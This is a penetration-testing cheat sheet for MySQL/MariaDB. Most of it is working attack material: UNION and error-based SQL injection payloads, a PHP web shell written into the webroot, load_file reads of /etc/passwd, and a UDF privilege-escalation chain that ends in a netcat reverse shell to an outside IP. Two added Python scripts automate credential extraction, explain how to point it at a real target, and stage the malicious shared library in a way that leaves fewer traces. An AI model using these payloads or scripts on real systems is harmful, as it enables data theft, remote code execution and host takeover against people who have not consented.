Port 3306 - MySQL/MariaDB

Connect:

mysql -h $IP -u$user -p$password
  • Remote logins are often refused (bind-address = 127.0.0.1, or the user is only granted for 'localhost'); nmap's mysql-info script reports this as "Host '...' is not allowed to connect to this MySQL server"

Config:

  • /etc/my.cnf (Debian/Ubuntu: /etc/mysql/my.cnf and /etc/mysql/mysql.conf.d/mysqld.cnf); look for bind-address, secure_file_priv, plugin_dir and the user mysqld runs as

Exploit:

  • UDF to RCE (usually a privesc step once you already have DB creds, see below)

Version:

select version();, select @@version;

User:

select user();

Generic UNION SQLi (the 1,2,3,4 placeholders must match the column count of the original query; find it with ORDER BY n first):

Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="user"

Insert Backdoor in PHP (needs FILE privilege, secure_file_priv empty, and the mysqld OS user must be able to write to the webroot; the path must be absolute or MySQL writes relative to its datadir):

' UNION SELECT "<?php echo passthru($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/cmd.php' -- -

Generic Error-Based SQLi (duplicate-key trick: the value comes back in the error "Duplicate entry ':<value>1' for key 'group_key'", one row per request, bump the LIMIT offset to walk the table):

' AND (SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT username FROM users LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)-- -
' AND (SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT password FROM users LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)-- -
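Automating the error-based extraction above: an added example, not part of these notes, that builds the duplicate-key payload for each row, pulls the leaked value out of the error text and walks the table until the LIMIT runs past the last row. simulated_target is a constructed stand-in for a page that echoes MySQL errors; against a real target replace it with a function that sends the payload in the injectable parameter (URL and parameter name are not given here) and returns the response body.

```python
import re
from typing import Callable, List, Optional

# Payload from the notes, parameterised on the subquery that picks the row.
# GROUP BY on concat(0x3a, <data>, floor(rand(0)*2)) makes MySQL collide on
# its temp-table key and print the key in the error:
#   Duplicate entry ':<data>1' for key 'group_key'   ('<group_key>' on 8.x)
PAYLOAD = (
    "' AND (SELECT 1 FROM (SELECT COUNT(*),"
    "concat(0x3a,({subq}),FLOOR(rand(0)*2))x "
    "FROM information_schema.TABLES GROUP BY x)a)-- -"
)

# Leading ':' is the 0x3a separator, trailing '1' is the floor(rand(0)*2) bit
# the collision always lands on. Old versions truncate the key in this message
# (64 chars), so long values need a SUBSTRING() window; not handled here.
DUP_RE = re.compile(r"Duplicate entry ':(.*?)1' for key '[^']*'")


def build_payload(column: str, table: str, row: int) -> str:
    """Injection string that leaks row `row` (0-based) of table.column."""
    subq = f"SELECT {column} FROM {table} LIMIT {row},1"
    return PAYLOAD.format(subq=subq)


def parse_leak(body: str) -> Optional[str]:
    """Return the leaked value from a response body, or None if no error."""
    m = DUP_RE.search(body)
    return m.group(1) if m else None


def dump(column: str, table: str, send: Callable[[str], str],
         max_rows: int = 1000) -> List[str]:
    """Walk LIMIT n,1 until a request leaks nothing.

    Past the last row the subquery is NULL, concat() becomes NULL, every
    group key is NULL and no duplicate is raised, so the leak stops.
    """
    values: List[str] = []
    for row in range(max_rows):
        val = parse_leak(send(build_payload(column, table, row)))
        if val is None:
            break
        values.append(val)
    return values


# --- constructed stand-in for a vulnerable page, for offline use only ---
_FAKE_DB = {"users": {"username": ["admin", "bob1"],
                      "password": ["s3cret", "hunter2"]}}
_SUBQ_RE = re.compile(r"SELECT (\w+) FROM (\w+) LIMIT (\d+),1")


def simulated_target(payload: str) -> str:
    """Mimic a page that echoes the MySQL error into its HTML (assumption)."""
    m = _SUBQ_RE.search(payload)
    col, table, row = m.group(1), m.group(2), int(m.group(3))
    rows = _FAKE_DB.get(table, {}).get(col, [])
    if row < len(rows):
        return (f"<pre>Duplicate entry ':{rows[row]}1' for key "
                f"'group_key'</pre>")
    return "<html>welcome</html>"


if __name__ == "__main__":
    for user, pw in zip(dump("username", "users", simulated_target),
                        dump("password", "users", simulated_target)):
        print(f"{user}:{pw}")
```

Against a real target, wrap requests.get() (or whatever the app needs) as send(); the rest stays the same because parse_leak only depends on the error string MySQL emits.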

Read File:

select load_file('/etc/passwd');
  • Needs the FILE privilege and secure_file_priv empty (NULL disables it, a directory restricts it to that directory); when blocked it silently returns NULL rather than an error

UDF PrivEsc Exploit:

Source for the UDF (lib_mysqludf_sys) ships with Metasploit:

https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql

Compile it on a matching arch (gcc -shared -fPIC -I/usr/include/mysql -o sqlpe.so lib_mysqludf_sys.c), get it onto the target (load_file below reads it from the target's own disk), and check first that secure_file_priv is empty and the DB user has FILE plus CREATE FUNCTION. The shell runs as the OS user mysqld runs as: root on old or misconfigured boxes, otherwise just mysql.

show variables like 'plugin_dir';
show variables like 'secure_file_priv';
create table zys(line blob);
insert into zys values(load_file('/tmp/sqlpe.so'));
select * from zys into dumpfile '/usr/lib/mysql/plugin/sqlpe.so';
create function sys_exec returns integer soname 'sqlpe.so';
select sys_exec('nc -nv 10.10.10.10 20 -e /bin/bash');
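Generating the staging SQL for the procedure above: an added example, not part of these notes or of lib_mysqludf_sys. It differs from the steps above in one way: the .so is embedded in the INSERT as a 0x... hex literal, so it never has to be uploaded to the target's filesystem for load_file() first. The preflight queries, the plugin path and the sys_exec/sqlpe.so names are assumptions taken from the notes.

```python
import sys
from pathlib import Path

# Run these on the target before staging anything (assumed checks, not from
# the notes): the route fails quietly if any of them is wrong.
PREFLIGHT = """\
SHOW VARIABLES LIKE 'secure_file_priv';  -- must be '': a path restricts dumpfile, NULL disables it
SHOW VARIABLES LIKE 'plugin_dir';        -- the .so has to be dumped exactly here
SELECT @@version_compile_os, @@version_compile_machine;  -- build the .so for this target
SHOW GRANTS;                             -- FILE and CREATE FUNCTION are needed
"""


def is_elf(so_bytes: bytes) -> bool:
    """Cheap sanity check: a UDF has to be an ELF shared object."""
    return so_bytes[:4] == b"\x7fELF"


def udf_stage_sql(so_bytes: bytes, plugin_dir: str, so_name: str = "sqlpe.so",
                  func: str = "sys_exec", table: str = "zys") -> str:
    """SQL that writes `so_bytes` into plugin_dir and registers `func`.

    The library travels as a hex literal inside the INSERT, so it never has
    to exist on the target disk first, and the scratch table is dropped
    afterwards so the staging leaves less behind.
    """
    if not is_elf(so_bytes):
        raise ValueError("not an ELF file; compile lib_mysqludf_sys first")
    dest = plugin_dir.rstrip("/") + "/" + so_name
    return "\n".join([
        f"CREATE TABLE {table}(line BLOB);",
        # exactly one row: INTO DUMPFILE refuses result sets of more than one
        f"INSERT INTO {table} VALUES(0x{so_bytes.hex()});",
        # DUMPFILE, not OUTFILE: raw bytes, no escaping or row terminators
        f"SELECT * FROM {table} INTO DUMPFILE '{dest}';",
        f"CREATE FUNCTION {func} RETURNS INTEGER SONAME '{so_name}';",
        f"DROP TABLE {table};",
    ]) + "\n"


if __name__ == "__main__":
    # usage: python3 stage_udf.py ./sqlpe.so /usr/lib/mysql/plugin > stage.sql
    blob = Path(sys.argv[1]).read_bytes()
    print(PREFLIGHT)
    print(udf_stage_sql(blob, sys.argv[2]))
```

Feed the output to the mysql client with -e or via stdin; once CREATE FUNCTION succeeds, select sys_exec('...') works exactly as in the steps above.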
